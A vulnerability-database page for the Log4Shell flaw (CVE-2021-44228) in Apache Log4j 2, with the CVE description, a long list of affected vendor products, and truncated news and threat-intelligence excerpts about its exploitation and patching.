Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
apache log4j 2.0 |
||
apache log4j |
||
siemens sppa-t3000_ses3000_firmware |
||
siemens logo\\! soft comfort |
||
siemens spectrum power 4 4.70 |
||
siemens spectrum power 4 |
||
siemens siveillance control pro |
||
siemens energyip prepay 3.7 |
||
siemens energyip prepay 3.8 |
||
siemens siveillance identity 1.6 |
||
siemens siveillance identity 1.5 |
||
siemens siveillance command |
||
siemens sipass integrated 2.85 |
||
siemens sipass integrated 2.80 |
||
siemens head-end system universal device integration system |
||
siemens gma-manager |
||
siemens energyip 8.5 |
||
siemens energyip 8.6 |
||
siemens energyip 8.7 |
||
siemens energyip 9.0 |
||
siemens energy engage 3.1 |
||
siemens e-car operation center |
||
siemens desigo cc info center 5.0 |
||
siemens desigo cc info center 5.1 |
||
siemens desigo cc advanced reports 4.1 |
||
siemens desigo cc advanced reports 4.2 |
||
siemens desigo cc advanced reports 5.0 |
||
siemens desigo cc advanced reports 5.1 |
||
siemens desigo cc advanced reports 4.0 |
||
siemens comos |
||
siemens captial 2019.1 |
||
siemens navigator |
||
siemens xpedition package integrator - |
||
siemens xpedition enterprise - |
||
siemens vesys 2019.1 |
||
siemens vesys |
||
siemens teamcenter |
||
siemens spectrum power 7 2.30 |
||
siemens spectrum power 7 |
||
siemens solid edge harness design 2020 |
||
siemens solid edge harness design |
||
siemens solid edge cam pro |
||
siemens siveillance viewpoint |
||
siemens siveillance vantage |
||
siemens siguard dsa 4.3 |
||
siemens siguard dsa 4.4 |
||
siemens siguard dsa 4.2 |
||
siemens sentron powermanager 4.2 |
||
siemens sentron powermanager 4.1 |
||
siemens operation scheduler |
||
siemens nx |
||
siemens opcenter intelligence |
||
siemens mindsphere |
||
siemens mendix |
||
siemens industrial edge management hub |
||
siemens industrial edge management |
||
siemens captial |
||
intel audio development kit - |
||
intel system debugger - |
||
intel secure device onboard - |
||
intel oneapi sample browser - |
||
intel sensor solution firmware development kit - |
||
intel computer vision annotation tool - |
||
intel genomics kernel library - |
||
intel system studio - |
||
intel data center manager - |
||
debian debian linux 9.0 |
||
debian debian linux 10.0 |
||
debian debian linux 11.0 |
||
fedoraproject fedora 34 |
||
fedoraproject fedora 35 |
||
sonicwall email security |
||
netapp oncommand insight - |
||
netapp cloud insights - |
||
netapp active iq unified manager - |
||
netapp cloud manager - |
||
netapp cloud secure agent - |
||
netapp ontap tools - |
||
netapp snapcenter - |
||
cisco unified communications manager im and presence service 11.5\\(1\\) |
||
cisco unified customer voice portal 11.6 |
||
cisco webex meetings server |
||
cisco packaged contact center enterprise 11.6\\(1\\) |
||
cisco webex meetings server 3.0 |
||
cisco identity services engine |
||
cisco data center network manager |
||
cisco webex meetings server 4.0 |
||
cisco unified contact center express |
||
cisco data center network manager 11.3\\(1\\) |
||
cisco identity services engine 2.4.0 |
||
cisco finesse |
||
cisco finesse 12.6\\(1\\) |
||
cisco nexus dashboard |
||
cisco network services orchestrator |
||
cisco iot operations dashboard - |
||
cisco intersight virtual appliance |
||
cisco evolved programmable network manager |
||
cisco dna spaces\\ _connector |
||
cisco cyber vision sensor management extension |
||
cisco crosswork zero touch provisioning |
||
cisco crosswork zero touch provisioning 3.0.0 |
||
cisco crosswork platform infrastructure |
||
cisco crosswork platform infrastructure 4.1.0 |
||
cisco crosswork optimization engine |
||
cisco crosswork optimization engine 3.0.0 |
||
cisco crosswork network controller 3.0.0 |
||
cisco crosswork network controller |
||
cisco crosswork data gateway 3.0.0 |
||
cisco crosswork data gateway |
||
cisco common services platform collector |
||
cisco cloudcenter |
||
cisco cloudcenter workload manager |
||
cisco cloudcenter suite admin |
||
cisco cloudcenter cost optimizer |
||
cisco business process automation |
||
cisco automated subsea tuning |
||
cisco nexus insights |
||
cisco advanced malware protection virtual private cloud appliance |
||
cisco customer experience cloud agent |
||
cisco workload optimization manager |
||
cisco ucs central |
||
cisco ucs director |
||
cisco sd-wan vmanage |
||
cisco optical network controller |
||
cisco fog director - |
||
cisco dna center |
||
cisco integrated management controller supervisor |
||
cisco wan automation engine |
||
cisco virtualized infrastructure manager |
||
cisco network assurance engine |
||
cisco virtual topology system |
||
cisco smart phy |
||
cisco prime service catalog |
||
cisco connected mobile experiences - |
||
cisco video surveillance operations manager |
||
cisco unity connection |
||
cisco virtualized voice browser |
||
cisco unified workforce optimization |
||
cisco unified sip proxy |
||
cisco unified intelligence center |
||
cisco unified customer voice portal |
||
cisco unified customer voice portal 12.0 |
||
cisco unified customer voice portal 12.5 |
||
cisco unified contact center enterprise |
||
cisco unified contact center enterprise 11.6\\(2\\) |
||
cisco unified communications manager im and presence service |
||
cisco unified communications manager |
||
cisco unified communications manager 11.5\\(1\\)su3 |
||
cisco unified communications manager 11.5\\(1\\) |
||
cisco paging server |
||
cisco packaged contact center enterprise |
||
cisco enterprise chat and email |
||
cisco emergency responder |
||
cisco contact center management portal |
||
cisco contact center domain manager |
||
cisco cloud connect |
||
cisco broadworks |
||
cisco fxos 7.0.0 |
||
cisco fxos 6.7.0 |
||
cisco fxos 6.6.0 |
||
cisco fxos 6.5.0 |
||
cisco fxos 6.4.0 |
||
cisco fxos 6.3.0 |
||
cisco fxos 6.2.3 |
||
cisco fxos 7.1.0 |
||
cisco prime service catalog 12.1 |
||
cisco firepower threat defense 6.2.3 |
||
cisco firepower threat defense 6.4.0 |
||
cisco firepower threat defense 6.3.0 |
||
cisco unity connection 11.5 |
||
cisco firepower threat defense 6.5.0 |
||
cisco firepower threat defense 6.6.0 |
||
cisco sd-wan vmanage 20.3 |
||
cisco sd-wan vmanage 20.6 |
||
cisco sd-wan vmanage 20.5 |
||
cisco cyber vision sensor management extension 4.0.2 |
||
cisco dna spaces connector - |
||
cisco unified sip proxy 010.002\\(001\\) |
||
cisco unified sip proxy 010.002\\(000\\) |
||
cisco unified sip proxy 010.000\\(001\\) |
||
cisco unified sip proxy 010.000\\(000\\) |
||
cisco unified intelligence center 12.6\\(2\\) |
||
cisco unified intelligence center 12.6\\(1\\) |
||
cisco unified customer voice portal 12.6\\(1\\) |
||
cisco unified customer voice portal 12.5\\(1\\) |
||
cisco unified customer voice portal 12.0\\(1\\) |
||
cisco unified customer voice portal 11.6\\(1\\) |
||
cisco unified contact center express 12.5\\(1\\) |
||
cisco unified communications manager im \\& presence service 11.5\\(1.22900.6\\) |
||
cisco unified communications manager im \\& presence service 11.5\\(1\\) |
||
cisco unified communications manager 11.5\\(1.22900.28\\) |
||
cisco unified communications manager 11.5\\(1.21900.40\\) |
||
cisco unified communications manager 11.5\\(1.18900.97\\) |
||
cisco unified communications manager 11.5\\(1.18119.2\\) |
||
cisco unified communications manager 11.5\\(1.17900.52\\) |
||
cisco paging server 9.1\\(1\\) |
||
cisco paging server 9.0\\(2\\) |
||
cisco paging server 9.0\\(1\\) |
||
cisco paging server 8.5\\(1\\) |
||
cisco paging server 8.4\\(1\\) |
||
cisco paging server 8.3\\(1\\) |
||
cisco paging server 14.0\\(1\\) |
||
cisco paging server 12.5\\(2\\) |
||
cisco unified contact center enterprise 12.6\\(2\\) |
||
cisco unified contact center enterprise 12.6\\(1\\) |
||
cisco unified contact center enterprise 12.5\\(1\\) |
||
cisco unified contact center enterprise 12.0\\(1\\) |
||
cisco finesse 12.5\\(1\\) |
||
cisco enterprise chat and email 12.6\\(1\\) |
||
cisco enterprise chat and email 12.5\\(1\\) |
||
cisco enterprise chat and email 12.0\\(1\\) |
||
cisco emergency responder 11.5\\(4.66000.14\\) |
||
cisco emergency responder 11.5\\(4.65000.14\\) |
||
cisco emergency responder 11.5 |
||
cisco unified contact center management portal 12.6\\(1\\) |
||
cisco unified contact center express 12.6\\(2\\) |
||
cisco unified contact center express 12.6\\(1\\) |
||
cisco broadworks - |
||
cisco unified computing system 006.008\\(001.000\\) |
||
cisco ucs central software 2.0\\(1l\\) |
||
cisco ucs central software 2.0\\(1k\\) |
||
cisco ucs central software 2.0\\(1h\\) |
||
cisco ucs central software 2.0\\(1g\\) |
||
cisco ucs central software 2.0\\(1f\\) |
||
cisco ucs central software 2.0\\(1e\\) |
||
cisco ucs central software 2.0\\(1d\\) |
||
cisco ucs central software 2.0\\(1c\\) |
||
cisco ucs central software 2.0\\(1b\\) |
||
cisco ucs central software 2.0\\(1a\\) |
||
cisco ucs central software 2.0 |
||
cisco integrated management controller supervisor 2.3.2.0 |
||
cisco integrated management controller supervisor 002.003\\(002.000\\) |
||
cisco sd-wan vmanage 20.6.1 |
||
cisco sd-wan vmanage 20.8 |
||
cisco sd-wan vmanage 20.7 |
||
cisco sd-wan vmanage 20.4 |
||
cisco optical network controller 1.1 |
||
cisco network assurance engine 6.0\\(2.1912\\) |
||
cisco dna center 2.2.2.8 |
||
cisco wan automation engine 7.6 |
||
cisco wan automation engine 7.5 |
||
cisco wan automation engine 7.4 |
||
cisco wan automation engine 7.3 |
||
cisco wan automation engine 7.2.3 |
||
cisco wan automation engine 7.2.2 |
||
cisco wan automation engine 7.2.1 |
||
cisco wan automation engine 7.1.3 |
||
cisco virtual topology system 2.6.6 |
||
cisco smart phy 3.2.1 |
||
cisco smart phy 3.1.5 |
||
cisco smart phy 3.1.4 |
||
cisco smart phy 3.1.3 |
||
cisco smart phy 3.1.2 |
||
cisco smart phy 21.3 |
||
cisco network services orchestrator - |
||
cisco intersight virtual appliance 1.0.9-343 |
||
cisco evolved programmable network manager 5.1 |
||
cisco evolved programmable network manager 5.0 |
||
cisco evolved programmable network manager 4.1 |
||
cisco evolved programmable network manager 4.0 |
||
cisco evolved programmable network manager 3.1 |
||
cisco evolved programmable network manager 3.0 |
||
cisco network dashboard fabric controller 11.5\\(3\\) |
||
cisco network dashboard fabric controller 11.5\\(2\\) |
||
cisco network dashboard fabric controller 11.5\\(1\\) |
||
cisco network dashboard fabric controller 11.4\\(1\\) |
||
cisco network dashboard fabric controller 11.3\\(1\\) |
||
cisco network dashboard fabric controller 11.2\\(1\\) |
||
cisco network dashboard fabric controller 11.1\\(1\\) |
||
cisco network dashboard fabric controller 11.0\\(1\\) |
||
cisco video surveillance manager 7.14\\(4.018\\) |
||
cisco video surveillance manager 7.14\\(3.025\\) |
||
cisco video surveillance manager 7.14\\(2.26\\) |
||
cisco video surveillance manager 7.14\\(1.26\\) |
||
cisco unified workforce optimization 11.5\\(1\\) |
||
cisco unity connection 11.5\\(1.10000.6\\) |
||
cisco cloudcenter suite 5.3\\(0\\) |
||
cisco cloudcenter suite 5.5\\(0\\) |
||
cisco cloudcenter suite 5.4\\(1\\) |
||
cisco automated subsea tuning 02.01.00 |
||
cisco identity services engine 003.002\\(000.116\\) |
||
cisco identity services engine 003.001\\(000.518\\) |
||
cisco identity services engine 003.000\\(000.458\\) |
||
cisco identity services engine 002.007\\(000.356\\) |
||
cisco identity services engine 002.006\\(000.156\\) |
||
cisco identity services engine 002.004\\(000.914\\) |
||
cisco firepower threat defense 7.1.0 |
||
cisco firepower threat defense 7.0.0 |
||
cisco firepower threat defense 6.7.0 |
||
cisco network insights for data center 6.0\\(2.1914\\) |
||
cisco cx cloud agent 001.012 |
||
cisco mobility services engine - |
||
cisco cloudcenter suite 5.5\\(1\\) |
||
cisco cloudcenter suite 4.10\\(0.15\\) |
||
cisco dna spaces - |
||
cisco cyber vision 4.0.2 |
||
cisco connected analytics for network deployment 7.3 |
||
cisco connected analytics for network deployment 008.000.000.000.004 |
||
cisco connected analytics for network deployment 008.000.000 |
||
cisco connected analytics for network deployment 007.003.003 |
||
cisco connected analytics for network deployment 007.003.001.001 |
||
cisco connected analytics for network deployment 007.003.000 |
||
cisco connected analytics for network deployment 007.002.000 |
||
cisco connected analytics for network deployment 007.001.000 |
||
cisco connected analytics for network deployment 007.000.001 |
||
cisco connected analytics for network deployment 006.005.000.000 |
||
cisco connected analytics for network deployment 006.005.000. |
||
cisco connected analytics for network deployment 006.004.000.003 |
||
cisco crosswork network automation 4.1.1 |
||
cisco crosswork network automation 4.1.0 |
||
cisco crosswork network automation - |
||
cisco crosswork network automation 3.0.0 |
||
cisco crosswork network automation 2.0.0 |
||
cisco common services platform collector 002.010\\(000.000\\) |
||
cisco common services platform collector 002.009\\(001.002\\) |
||
cisco common services platform collector 002.009\\(001.001\\) |
||
cisco common services platform collector 002.009\\(001.000\\) |
||
cisco common services platform collector 002.009\\(000.002\\) |
||
cisco common services platform collector 002.009\\(000.001\\) |
||
cisco common services platform collector 002.009\\(000.000\\) |
||
snowsoftware vm access proxy |
||
snowsoftware snow commander |
||
bentley synchro 4d |
||
bentley synchro |
||
percussion rhythmyx |
Symantec data shows variation and scope of attacks.
Posted: 23 Dec, 20214 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinLog4j Vulnerabilities: Attack InsightsSymantec data shows variation and scope of attacks.Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...
Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability
Posted: 11 Dec, 20211 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinApache Log4j Zero-Day Being Exploited in the WildSymantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...
Posted: 13 Oct, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinBudworm: Espionage Group Returns to Targeting U.S. OrganizationsRecent attacks by group have spanned continents and include first confirmed attacks seen against the U.S. in a number of years.The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a mul...
Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.
Posted: 28 Apr, 20228 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinRansomware: How Attackers are Breaching Corporate NetworksLatest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...
Espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.
Posted: 27 Apr, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinStonefly: North Korea-linked Spying Operation Continues to Hit High-value TargetsEspionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...
Symantec takes a look at the cyber security trends that shaped the year
Posted: 19 Jan, 20226 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinThe Threat Landscape in 2021Symantec takes a look at the cyber security trends that shaped the yearFrom the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021.
A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at the some of t...
IT threat evolution in Q3 2022
IT threat evolution in Q3 2022. Non-mobile statistics
IT threat evolution in Q3 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
Quarterly figures
According to Kaspersky Security Network, in Q3 2022:
Kaspersky solutions blocked 956,074,958 attacks from online resources acros...
IT threat evolution in Q2 2022
IT threat evolution in Q2 2022. Non-mobile statistics
IT threat evolution in Q2 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
Quarterly figures
According to Kaspersky Security Network, in Q2 2022:
Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.
...
CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data.
After its disclosure in December 2021, multiple threat act...
A rapidly evolving IoT malware dubbed “EnemyBot” is targeting content management systems (CMS), web servers and Android devices. Threat actor group “Keksec” is believed behind the distribution of the malware, according to researchers.
“Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,” reported AT&T Alien labs in a recent post. “The malware is rapidly adopting one-day vulnerab...
It’s been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j library, was discovered, and threat analysts warn that the application of the available fixes is still way behind.
Although the public interest and focus of the infosec community have moved to newer vulnerabilities and exploits,
continues to be a large-scale problem and a grave security risk.
The last time we touched the subject of Log4Shell exploitation was roughly two m...
The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.
Spring4Shell is a
tracked as CVE-2022-22965, affecting Spring Framework, a widely used enterprise-level Java app development platform.
Spring released emergency updates to
a few days after its discovery, but threat actors' exploitation of vulnerable deployments was already underway.
While&...
USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.
In a report published by Mandiant on Tuesday, researchers described a prolonged incursion conducted by APT41. They detected the activity in May 2021 and tracked it through last month, February 2022, observing the spy g...
The UK's NHS Digital agency is warning organizations to apply new security updates for a remote code execution vulnerability in the Windows client for the Okta Advanced Server Access authentication management platform.
"NHS Digital is the national digital, data and technology delivery partner for the NHS and social care system," explains
for NHS Digital.
In an
released yesterday, all organizations are advised to apply the latest patches for the Okta Advanced...
Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), stated in a public news interview that the now-infamous Log4j flaw is the “the most serious vulnerability that [she has] seen in her career.” It’s not a stretch to say the whole security industry would agree.
December of 2021 will be looked back on with a tinge of trauma and dread for incident responders, system administrators and security practitioners. You all probably already know— on Dece...
In a warning issued on Thursday, the Dutch National Cybersecurity Centre (NCSC) says organizations should still be aware of risks connected to Log4j attacks and remain vigilant for ongoing threats.
Even though the aftermath of recent incidents connected to Log4Shell exploitation was "not too bad" because many organizations have acted quickly to mitigate these critical vulnerabilities, the NCSC says that threat actors are most likely still planning to breach new targets.
"It is ex...
Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.
This is a confusing story: Initially, Microsoft had warned on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks’ internal devices via the SolarWinds bug.
SolarWinds had issued a fix the day before, on Tuesday.
SolarWinds subsequently reached...
It’s not my intention to be alarmist about the Log4j vulnerability (CVE-2021-44228), known as Log4Shell, but this one is pretty bad.
First of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the most serious vulnerability she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberatta...
Today, the Russian government announced that they
on behalf of US authorities.
While the ransomware gang members are only being charged with "illegal circulation of means of payment," the arrests are the first public action by Russia to stem the activities of ransomware gangs operating within the country.
Furthermore, Russia states that they took this action on behalf of US law enforcement, who they have historically been reluctant to help in criminal cybercrime investigation...
Get our weekly newsletter It's not as though folks haven't been warned about this
There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository.
That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks.
Tracked as CVE-2021...
The Night Sky ransomware gang has started to exploit the critical CVE-2021-44228 vulnerability in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.
The threat actor is targeting vulnerable machines exposed on the public web from domains that impersonate legitimate companies, some of them in the technology and cybersecurity sectors.
Spotted in late December 2021 by security researcher MalwareHunterTeam,
. It has encrypted multiple vic...
UK's National Health Service (NHS) has published a cyber alert warning of an unknown threat group targeting VMware Horizon deployments with Log4Shell exploits.
Log4Shell is an exploit for
, a critical arbitrary remote code execution flaw in the Apache Log4j 2.14, which has been under active and
since December 2021.
Apache addressed the above and four more vulnerabilities via subsequent security updates, and
is now considered adequately secure.
According t...
The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data from the risks of the Log4j vulnerabilities, it warned on Tuesday.
“The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,” according to the warning.
Those companies that bungle consumer d...
Get our weekly newsletter Apply fixes responsibly in a timely manner or face the wrath of Lina Khan
The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else.
In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late.
The FTC is advising companies to consu...
No surprise here: The holidays bought no Log4Shell relief.
Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library.
“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” according to Micro...
Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability.
Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack that involved of a large undisclosed academic institution, according to research released Wednesday.
“Aquatic Panda is a China-based [APT] with a dual mission of intelligence c...
One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version.
Soon enough, threat actors approached ONUS to extort a $5 million sum and threatened to publish the customer data should ONUS refuse to comply.
After the company's refusal to pay the ransom, threat actors put up data of nearly 2 million ONUS customers for sale on forums.
On December 9th, the
for the notorious
Apache has released another Log4j version, 2.17.1 fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832.
Prior to today, 2.17.0 was the most recent version of Log4j and deemed the safest release to upgrade to, but that advice has now evolved.
Mass exploitation of the original
(CVE-2021-44228) by threat actors began around December 9th, when a
for it surfaced on GitHub.
Given Log4j's vast usage in the majority...
As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).
While 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-re...
The Department of Homeland Security (DHS) has announced that the 'Hack DHS' program is now also open to bug bounty hunters willing to track down DHS systems impacted by Log4j vulnerabilities.
"In response to the recently discovered log4j vulnerabilities, @DHSgov is expanding the scope of our new #HackDHS bug bounty program and including additional incentives to find and patch log4j-related vulnerabilities in our systems,"
DHS Secretary Alejandro N. Mayorkas.
"In partnersh...
No, you’re not seeing triple: On Friday, Apache released yet another patch – version 2.17 – for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.
Trouble comes in threes, and this is the third one for log4j. The latest bug isn’t a variant of the Log4Shell remote-code execution (RCE) bug that’s plagued IT teams since Dec. 10, coming under active attack worldwide within hours of its public disclosure, spawning even nastier mutations and leading to t...
Get our weekly newsletter Third major fix in ten days is an infinite recursion flaw rated 7.5/10
The Apache Software Foundation (ASF) has revealed a third bug in its Log4 Java-based open-source logging library Log4j.
CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j.
That’s the third new version of the tool in the last ten days.
In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remot...
Get our weekly newsletter Federal agencies have a week to get their systems patched
The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021.
Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released...
Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.
KnownSec 404 Team's Heige first reported these attacks
on Monday after observing that the ransomware was dropped on old Windows systems using exploits abusing the flaw tracked as CVE-2021-44228 and known as
.
Heige's report was confir...
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.
This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
For now, this trend was observed by threat actors looking to hijack resources for Monero mining, but others could adopt it at any time.
Most attacks targeting t...
Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.
Mojang Studios, the Swedish video game developer behind Minecraft,
last week to address the bug tracked as
in the Apache Log4j Java logging library(used by the game's Java Edition client and multiplayer servers).
While there was no mention of attacks targeting Minecraft serv...
Call it a “logjam” of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies’ telemetry using at least 70 distinct malware families — and the fallout from the Log4j vulnerability is just beginning.
Researchers manning keyboards all over the world have spent the past several days chasing attacks aimed at a now-infamous Log4j Java library bug, dubbed Log4Shell (CVE-2021-44228). Side note: Log4j is pronounced,...
SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Java-based logging library that’s been under active attack since last week.
As of yesterday, Patch Tuesday, the German software maker reported that it’s already patched 20 of those apps, and it’s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in this document, accessible to users on the company’s support portal.
...
As if finding one easily exploited and extremely dangerous flaw in the ubiquitous Java logging library Apache Log4j hadn’t already turned the Internet security community on its ear, researchers now have found a new vulnerability in Apache’s patch issued to mitigate it.
Last Thursday security researchers began warning that a vulnerability tracked as CVE-2021-44228 in Apache Log4j was under active attack and had the potential, according to many reports, to break the internet. Dubbed Log4...
Get our weekly newsletter Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?
Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole.
Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Succ...
As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging library.
Also known as Log4Shell or LogJam, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.
Among the first threat actors to leverage Log4Shell to drop payloads are cryptocurren...
News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an “internet meltdown,” as well as the “worst cybersecurity bug of the year.” Names like “Apple,” “Twitter” and “Cloudflare” are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?
We asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs i...
Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet.
However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and re...
Get our weekly newsletter Private equity owners play pass the parcel
One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation.
"The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners.
Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools ...
Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet.
However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and re...
Just as the holiday season is approaching our doorstep, a critical vulnerability in an Apache code library called Log4j 2 has come knocking at the door. Log4j is an open-source Java-based logging library that is widely used by many products, services and Java components. It’s little surprise that the flaw, which scored a perfect 10 on the CVSS scale and is putting countless servers at risk of complete takeover, has sent shockwaves far beyond the security industry.
Indeed, with proof of c...
Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical remote code-execution (RCE) flaw (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.
Now under active exploit, the “Log4Shell” bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.
First, analysts at Net...
The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.
